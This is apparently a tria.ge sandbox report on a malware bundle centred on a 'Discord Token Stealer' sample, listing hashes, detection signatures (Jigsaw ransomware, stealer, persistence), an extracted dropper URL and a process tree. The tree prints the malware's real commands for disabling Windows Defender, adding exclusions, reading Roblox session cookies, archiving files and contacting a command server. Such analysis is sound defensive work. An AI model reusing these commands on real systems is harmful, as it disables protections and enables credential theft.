Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

5

My-Skidded...f2.exe

windows11-21h2-x64

My-Skidded...Us.vbs

windows11-21h2-x64

1

My-Skidded...AT.exe

windows11-21h2-x64

10

My-Skidded...UN.exe

windows11-21h2-x64

10

My-Skidded...no.exe

windows11-21h2-x64

6

My-Skidded...MK.exe

windows11-21h2-x64

My-Skidded...ck.vbs

windows11-21h2-x64

1

My-Skidded...it.exe

windows11-21h2-x64

7

My-Skidded... 2.bat

windows11-21h2-x64

3

My-Skidded...OR.vbs

windows11-21h2-x64

1

My-Skidded...ge.exe

windows11-21h2-x64

My-Skidded...ck.exe

windows11-21h2-x64

10

My-Skidded...BR.exe

windows11-21h2-x64

My-Skidded...ba.vbs

windows11-21h2-x64

My-Skidded...ad.exe

windows11-21h2-x64

My-Skidded...BR.exe

windows11-21h2-x64

6

My-Skidded...AL.exe

windows11-21h2-x64

6

My-Skidded...en.exe

windows11-21h2-x64

6

My-Skidded...in.exe

windows11-21h2-x64

6

My-Skidded...BR.exe

windows11-21h2-x64

My-Skidded...64.exe

windows11-21h2-x64

My-Skidded...64.exe

windows11-21h2-x64

10

My-Skidded...24.exe

windows11-21h2-x64

10

My-Skidded....0.bat

windows11-21h2-x64

3

My-Skidded...as.exe

windows11-21h2-x64

My-Skidded...ll.bat

windows11-21h2-x64

My-Skidded...ks.exe

windows11-21h2-x64

My-Skidded...ua.exe

windows11-21h2-x64

My-Skidded...kz.bat

windows11-21h2-x64

8

My-Skidded...BR.exe

windows11-21h2-x64

6

My-Skidded...UG.exe

windows11-21h2-x64

My-Skidded...mi.exe

windows11-21h2-x64

6

Resubmissions

11/03/2025, 00:00

250311-aaawtasr13 5

10/03/2025, 21:57

250310-1t6eyazlx6 10

09/03/2025, 01:58

250309-cdv29swybs 10

08/03/2025, 06:55

250308-hp35xatjt9 10

08/03/2025, 04:53

250308-fh1ebssky5 10

Analysis

  • max time kernel
    900s
  • max time network
    904s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10/03/2025, 21:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    My-Skidded-malwares-main/PanKoza2.0 Discord Token Stealer 2024.exe

  • Size

    9.5MB

  • MD5

    6c21e9957b540c1fc5c6c30f991423dd

  • SHA1

    3937d74580a14bb8debd9c763fb1816cb26b881d

  • SHA256

    fd6b4896e31a516c1aceae5d2e82822dc0efdecbcebf882b2875e57ce9e26cb0

  • SHA512

    f4b7825e1cd7267b2bc9e8801c19ae72b76a0269dd0fb144303494882eb68bc4f0e2d8b6766f80252b6acd12090a6b6f0c4bc5e2c089d35a24e0a64de2bda5ba

  • SSDEEP

    196608:weurQ4kCMsjWDqYbcMtnpVGNrzUrTg6aXW/aHIFU7s39:C84keyDFcMtpcqI62WO

Score
10/10
jigsawcredential_accessdefense_evasiondiscoveryexecutionmacromacro_on_actionpersistenceprivilege_escalationransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://onion1.host:443/temper/PGPClient.exe

Signatures

  • Jigsaw Ransomware

    Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.

    ransomwarejigsaw
  • Jigsaw family
    jigsaw
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Renames multiple (1796) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (86) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

    macromacro_on_action
  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

    macro
  • Drops startup file 2 IoCs
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 1 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 1 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 45 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 47 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\PanKoza2.0 Discord Token Stealer 2024.exe
    "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\PanKoza2.0 Discord Token Stealer 2024.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQBSAFIATwBSACAANAAwADQAOgAgAEMAYQBuAG4AbwB0ACAAYwBvAG4AbgBlAGMAdAAgAHQAbwAgAHMAZQByAHYAZQByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGoAdQBqACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeQB6ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3840
    • C:\Users\Admin\AppData\Local\Temp\CollabVM.exe
      "C:\Users\Admin\AppData\Local\Temp\CollabVM.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2764
    • C:\Users\Admin\AppData\Local\Temp\yababi.exe
      "C:\Users\Admin\AppData\Local\Temp\yababi.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4932
      • C:\Users\Admin\AppData\Local\Temp\yababi.exe
        "C:\Users\Admin\AppData\Local\Temp\yababi.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\yababi.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\yababi.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3512
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏  .scr'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏  .scr'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4104
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3520
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:220
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          4⤵
            PID:5452
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:5580
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
            4⤵
              PID:4152
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:6012
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Dw3IR.zip" *"
              4⤵
                PID:6108
                • C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe
                  C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Dw3IR.zip" *
                  5⤵
                  • Executes dropped EXE
                  PID:2276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                4⤵
                  PID:1940
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic os get Caption
                    5⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2992
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                  4⤵
                    PID:4632
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic computersystem get totalphysicalmemory
                      5⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5180
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    4⤵
                      PID:5168
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic csproduct get uuid
                        5⤵
                          PID:3080
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                        4⤵
                          PID:2872
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:1696
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                          4⤵
                            PID:2456
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic path win32_VideoController get name
                              5⤵
                              • Detects videocard installed
                              PID:5352
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                            4⤵
                              PID:4944
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                5⤵
                                  PID:2816
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                  5⤵
                                    PID:5396
                            • C:\Users\Admin\AppData\Local\Temp\donut.exe
                              "C:\Users\Admin\AppData\Local\Temp\donut.exe"
                              2⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:2008
                              • C:\Users\Admin\AppData\Local\Temp\L7hd1sN38DOkhk3MONcMQF2yQPoSAoas.exe
                                "C:\Users\Admin\AppData\Local\Temp\L7hd1sN38DOkhk3MONcMQF2yQPoSAoas.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3188
                            • C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe
                              "C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe"
                              2⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:3356
                              • C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
                                "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                PID:4776
                            • C:\Users\Admin\AppData\Local\Temp\OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe
                              "C:\Users\Admin\AppData\Local\Temp\OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe"
                              2⤵
                              • Modifies WinLogon for persistence
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:944
                              • C:\Users\Admin\AppData\Roaming\ppbydueq\ubhyrv.exe
                                "C:\Users\Admin\AppData\Roaming\ppbydueq\ubhyrv.exe"
                                3⤵
                                • Executes dropped EXE
                                • Maps connected drives based on registry
                                • Drops file in Windows directory
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                • Checks SCSI registry key(s)
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:3128
                                • C:\Users\Admin\AppData\Roaming\ppbydueq\ubhyrv.exe
                                  "C:\Users\Admin\AppData\Roaming\ppbydueq\ubhyrv.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3380
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" http://195.5.161.187/check_install.php?mc=C6DAEB58DB38&adv=235&sub=0&dk=61C86CE02F1DAF030FFC582466000A3C258A2C000B34CAA166AE3B370B2932A4AB
                                  4⤵
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of WriteProcessMemory
                                  PID:5068
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://195.5.161.187/check_install.php?mc=C6DAEB58DB38&adv=235&sub=0&dk=61C86CE02F1DAF030FFC582466000A3C258A2C000B34CAA166AE3B370B2932A4AB"
                                    5⤵
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of WriteProcessMemory
                                    PID:5204
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd51503cb8,0x7ffd51503cc8,0x7ffd51503cd8
                                      6⤵
                                        PID:5332
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
                                        6⤵
                                          PID:5620
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 /prefetch:3
                                          6⤵
                                            PID:5628
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                            6⤵
                                              PID:5668
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
                                              6⤵
                                                PID:5772
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
                                                6⤵
                                                  PID:5788
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
                                                  6⤵
                                                    PID:6076
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                                                    6⤵
                                                      PID:3056
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
                                                      6⤵
                                                        PID:3552
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                                        6⤵
                                                          PID:4104
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
                                                          6⤵
                                                            PID:2696
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:1
                                                            6⤵
                                                              PID:4588
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:8
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4432
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
                                                              6⤵
                                                                PID:5176
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                                                                6⤵
                                                                  PID:3384
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7164 /prefetch:2
                                                                  6⤵
                                                                    PID:2656
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,16035615845878843605,6387244186841669763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
                                                                    6⤵
                                                                      PID:3680
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
